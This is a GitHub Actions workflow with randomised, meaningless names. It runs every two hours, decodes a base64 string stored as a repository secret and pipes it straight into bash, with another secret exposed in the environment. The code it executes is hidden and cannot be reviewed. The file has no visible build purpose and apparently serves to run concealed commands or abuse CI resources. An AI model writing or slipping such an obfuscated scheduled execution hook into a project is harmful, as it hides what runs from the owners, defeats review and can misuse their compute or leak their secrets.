name: bxavil
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  TmVNtwUgm:
    runs-on: ubuntu-22.04
    env:
      OSrOQFVE: ${{ secrets.CXIfocTCfcYG }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.wOCJcmto }}" | base64 -d | bash
